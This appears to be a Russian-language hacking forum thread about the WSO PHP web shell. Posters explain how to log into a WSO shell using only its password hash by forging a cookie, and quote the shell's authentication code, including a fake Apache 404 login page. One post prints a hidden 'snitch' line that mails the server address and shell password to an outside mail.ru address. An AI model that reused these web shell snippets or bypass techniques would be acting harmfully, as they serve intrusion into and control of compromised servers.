WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
     
  2. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    317
    Likes Received:
    476
    Reputations:
    146
    В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    689
    Reputations:
    805
    Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
     
    _________________________
  4. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
     
  5. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    111
    Likes Received:
    44
    Reputations:
    2
    Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    689
    Reputations:
    805
    Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!

    Давайте посмотрим в сторону кода самого шела как происходит авторизация:

    PHP:
    $auth_pass "63a9f0ea7bb98050796b649e85481845"//пусть условно будет пароль root

    //..........

    if(!empty($auth_pass)) {   //если присутствует пароль
        
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) // и пароль равен его хэшь сумме
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); // отправляем куку с параметром хэшь хоста и значением хэшь пароля

        
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            
    wsoLogin();
    }
    предположим что у нас HOST: localhost

    тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:

    421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb98050796b649e85481845
     
    _________________________
    SuNDowN, ACat, Shubka75 and 6 others like this.
  7. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
  8. shmell

    shmell New Member

    Joined:
    1 Mar 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    689
    Reputations:
    805
    __tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

    PHP:
    if(array_key_exists('watching',$_POST)){
        
    $tmp $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru''root'$tmp); // Edit or delete!
    }
    Стучалку и вырезать можно!
     
    _________________________
    grimnir likes this.
  10. rdpstore555

    rdpstore555 New Member

    Joined:
    16 Dec 2017
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    thnks for this
     
  11. shmell

    shmell New Member

    Joined:
    1 Mar 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.
     
  12. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    81
    Likes Received:
    70
    Reputations:
    -8
    PHP:
    . . .
    @
    session_start();
    @
    ini_set('error_log',NULL);
    @
    ini_set('log_errors',0);
    @
    ini_set('max_execution_time',0);
    @
    set_time_limit(0);
    @
    set_magic_quotes_runtime(0);
    @
    define('WSO_VERSION''2.6');
    if(
    get_magic_quotes_gpc()) {
    function 
    WSOstripslashes($array) {
    return 
    is_array($array) ? array_map('WSOstripslashes'$array) : stripslashes($array);
    }
    $_POST WSOstripslashes($_POST);
    }
    function 
    wsoLogin() {
    die(
    "<h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
    <hr>
    <address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
    <style>
    input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <pre align=center>
    <form method=post>
    <input type=password name=pass>
    </form></pre>"
    );
    }
    if(!isset(
    $_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty(
    $auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
    $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
    wsoLogin();
    if(
    strtolower(substr(PHP_OS,0,3)) == "win")
    $os 'win';
    else
    $os 'nix'; . . .
    А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.
     
  13. Matrix001

    Matrix001 Member

    Joined:
    18 Aug 2016
    Messages:
    69
    Likes Received:
    17
    Reputations:
    0
    Возможно (скорее всего) ...
     
  14. MrSeo

    MrSeo New Member

    Joined:
    Saturday
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    так наивно впихнули стучалку )